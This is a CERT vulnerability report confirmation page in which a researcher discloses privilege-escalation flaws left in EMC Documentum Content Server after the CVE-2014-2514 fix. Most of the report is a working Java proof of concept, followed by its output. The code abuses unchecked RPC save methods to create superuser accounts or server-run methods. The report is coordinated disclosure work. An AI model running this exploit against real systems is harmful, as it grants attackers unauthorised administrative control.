Vulnerability Report Confirmation - [VRF#HX5OLZ0F] Your vulnerability report has been successfully received. You may save or print this page for your own records. The Report Tracking ID assigned to this report is VRF#HX5OLZ0F. Details of your report are listed below. If you have any questions or require additional information, please call the CERT Hotline at +1 412-268-7090 or send email to cert@cert.org . Please reference this Report Tracking ID: VRF#HX5OLZ0F. Do not use the back button to submit another report. Click here instead. ------------------------------------------------------------------------ Vulnerability Report Name Andrey B. Panfilov Organization independent Email Address andrew@panfilov.tel Telephone Number Vulnerability Description Backdoors in CVE-2014-2514. When fixing vulnerabilities vendor has left 5 ways to elevate privileges using the same technique as was described in VRF#HUFG9EBA: Documentum Content Server still does not check input arguments for some RPC commands. Slightly modified PoC from VRF#HUFG9EBA (the only difference is now save operations are performed against new objects, i.e. attacker is able to create new malicious docbase methods or users with superuser privilege): ==========================================8<================================ ============================= import java.util.*; import com.documentum.fc.client.*; import com.documentum.fc.client.impl.objectmanager.TypeMechanics; import com.documentum.fc.common.*; /** * @author Andrey B. Panfilov */ public class Test { public static void main(String[] argv) throws Exception { String docbase = argv[0]; String userName = argv[1]; String password = argv[2]; IDfSession session = null; try { session = new DfClient().newSession(docbase, new DfLoginInfo( userName, password)); IDfUser user = session.getUser(null); if (user.isSuperUser() || user.isSystemAdmin()) { System.out.println("User " + userName + " has too wide privileges, choose different one"); System.exit(0); } int len = 0; Set saveMethods = new LinkedHashSet(); for (Object o : TypeMechanics.getAllInstances()) { String methodName = ((TypeMechanics) o).getSaveMethod(); saveMethods.add(methodName); if (methodName.length() > len) { len = methodName.length(); } } List ids = getNextIds(session, 16, saveMethods.size()); Iterator idIterator = ids.iterator(); for (String method : saveMethods) { System.out.format( "%-" + String.valueOf(len + 1) + "s: %s\n", method, "is " + (checkDmMethod(session, method, idIterator.next()) ? "" : "not ") + "vulnerable for dm_method objects"); } ids = getNextIds(session, 17, saveMethods.size()); idIterator = ids.iterator(); for (String method : saveMethods) { System.out.format( "%-" + String.valueOf(len + 1) + "s: %s\n", method, "is " + (checkDmUser(session, method, idIterator.next()) ? "" : "not ") + "vulnerable for dm_user objects"); } } finally { if (session != null) { session.disconnect(); } } } public static Boolean checkDmUser(IDfSession session, String method, String id) throws DfException { String userName = String.valueOf(System.currentTimeMillis()); try { session.beginTrans(); IDfList params = new DfList(new String[] {"OBJECT_TYPE", "IS_NEW_OBJECT", "i_vstamp", "user_name", "user_login_name", "user_os_name", "user_privileges", }); IDfList types = new DfList(new String[] {"S", "B", "I", "S", "S", "S", "I" }); IDfList values = new DfList(new String[] {"dm_user", "T", String.valueOf(0), userName, userName, userName, String.valueOf(16) }); try { session.apply(id, method, params, types, values); } catch (DfException ex) { // ignore } IDfUser object = (IDfUser) session.getObject(DfId.valueOf(id)); if (userName.equals(object.getString("user_name"))) { return true; } else { return false; } } catch (DfException ex) { return false; } finally { session.abortTrans(); } } public static Boolean checkDmMethod(IDfSession session, String method, String id) throws DfException { String methodVerb = String.valueOf(System.currentTimeMillis()); try { session.beginTrans(); IDfUser user = session.getUser(null); IDfList params = new DfList(new String[] {"OBJECT_TYPE", "IS_NEW_OBJECT", "i_vstamp", "object_name", "r_object_type", "acl_name", "owner_name", "owner_permit", "run_as_server", "method_verb", }); IDfList types = new DfList(new String[] {"S", "B", "I", "S", "S", "S", "S", "I", "B", "S", }); IDfList values = new DfList(new String[] {"dm_method", "T", String.valueOf(0), String.valueOf(methodVerb), "dm_method", user.getACLName(), user.getUserName(), String.valueOf(7), "T", String.valueOf(methodVerb), }); try { session.apply(id, method, params, types, values); } catch (DfException ex) { // ignore } IDfSysObject object = (IDfSysObject) session.getObject(DfId .valueOf(id)); if (methodVerb.equals(object.getString("method_verb"))) { return true; } else { return false; } } catch (DfException ex) { return false; } finally { session.abortTrans(); } } private static List getNextIds(IDfSession session, int tag, int howMany) throws DfException { IDfList params = new DfList(new String[] {"TAG", "HOW_MANY", }); IDfList types = new DfList(new String[] {"I", "I", }); IDfList values = new DfList(new String[] {String.valueOf(tag), String.valueOf(howMany), }); IDfCollection collection = session.apply(DfId.DF_NULLID.getId(), "NEXT_ID_LIST", params, types, values); List result = new ArrayList(); try { while (collection.next()) { for (int i = 0, n = collection.getValueCount("next_id"); i < n; i++) { result.add(collection.getRepeatingString("next_id", i)); } } } finally { collection.close(); } return result; } } ==========================================>8================================ ============================= ==========================================8<================================ ============================= ~]$ java Test repo user password SAVE : is not vulnerable for dm_method objects ContainmentSave : is not vulnerable for dm_method objects SAVE_CONT_ATTRS : is not vulnerable for dm_method objects SysObjSave : is not vulnerable for dm_method objects FolderSave : is not vulnerable for dm_method objects CabinetSave : is not vulnerable for dm_method objects AssemblySave : is not vulnerable for dm_method objects SET_STORAGE : is not vulnerable for dm_method objects UserSave : is not vulnerable for dm_method objects GroupSave : is not vulnerable for dm_method objects RegTableSave : is not vulnerable for dm_method objects RouterSave : is not vulnerable for dm_method objects InboxItemSave : is not vulnerable for dm_method objects SAVE_FORMAT : is not vulnerable for dm_method objects MAKE_DUMP : is not vulnerable for dm_method objects RelationSave : is not vulnerable for dm_method objects MAKE_FTINDEX : is not vulnerable for dm_method objects RelationTypeSave : is not vulnerable for dm_method objects DocbaseIdMapSave : is not vulnerable for dm_method objects ACLSave : is vulnerable for dm_method objects PolicySave : is not vulnerable for dm_method objects ReferenceSave : is vulnerable for dm_method objects WflowSave : is not vulnerable for dm_method objects IPKGSave : is not vulnerable for dm_method objects WITEMSave : is not vulnerable for dm_method objects dmAuditTrailSave : is vulnerable for dm_method objects AliasSetSave : is not vulnerable for dm_method objects LiteObjSave : is not vulnerable for dm_method objects PARTITION_SCHEME_SAVE : is not vulnerable for dm_method objects dmScopeConfigSave : is not vulnerable for dm_method objects dmDisplayConfigSave : is not vulnerable for dm_method objects CLIENT_RIGHTS_DOMAIN_SAVE : is not vulnerable for dm_method objects SAVE : is not vulnerable for dm_user objects ContainmentSave : is not vulnerable for dm_user objects SAVE_CONT_ATTRS : is not vulnerable for dm_user objects SysObjSave : is not vulnerable for dm_user objects FolderSave : is not vulnerable for dm_user objects CabinetSave : is not vulnerable for dm_user objects AssemblySave : is not vulnerable for dm_user objects SET_STORAGE : is not vulnerable for dm_user objects UserSave : is not vulnerable for dm_user objects GroupSave : is not vulnerable for dm_user objects RegTableSave : is not vulnerable for dm_user objects RouterSave : is not vulnerable for dm_user objects InboxItemSave : is not vulnerable for dm_user objects SAVE_FORMAT : is not vulnerable for dm_user objects MAKE_DUMP : is not vulnerable for dm_user objects RelationSave : is not vulnerable for dm_user objects MAKE_FTINDEX : is not vulnerable for dm_user objects RelationTypeSave : is not vulnerable for dm_user objects DocbaseIdMapSave : is not vulnerable for dm_user objects ACLSave : is not vulnerable for dm_user objects PolicySave : is not vulnerable for dm_user objects ReferenceSave : is vulnerable for dm_user objects WflowSave : is not vulnerable for dm_user objects IPKGSave : is not vulnerable for dm_user objects WITEMSave : is not vulnerable for dm_user objects dmAuditTrailSave : is vulnerable for dm_user objects AliasSetSave : is not vulnerable for dm_user objects LiteObjSave : is not vulnerable for dm_user objects PARTITION_SCHEME_SAVE : is not vulnerable for dm_user objects dmScopeConfigSave : is not vulnerable for dm_user objects dmDisplayConfigSave : is not vulnerable for dm_user objects CLIENT_RIGHTS_DOMAIN_SAVE : is not vulnerable for dm_user objects ==========================================>8================================ ============================= Can we provide your name to the vendor? Yes Do you want to be publicly acknowledged? Yes Vendor Contact Status will not contact Vendor Name EMC Vendor Contact Name Vendor Contact Email Vendor Contact Telephone Number Vendor Tracking ID Additional Vendor Information Affected System Configurations All versions of EMC Documentum Content Server How was this vulnerability found? Is the vulnerability being exploited? Yes Is there a public exploit? No Vulnerability Impact Comments Attached File Date 2014-07-03T02:17:53 Report Tracking ID VRF#HX5OLZ0F CERT Tracking IDs VU#315340 ------------------------------------------------------------------------ Carnegie Mellon University ©2014 Carnegie Mellon University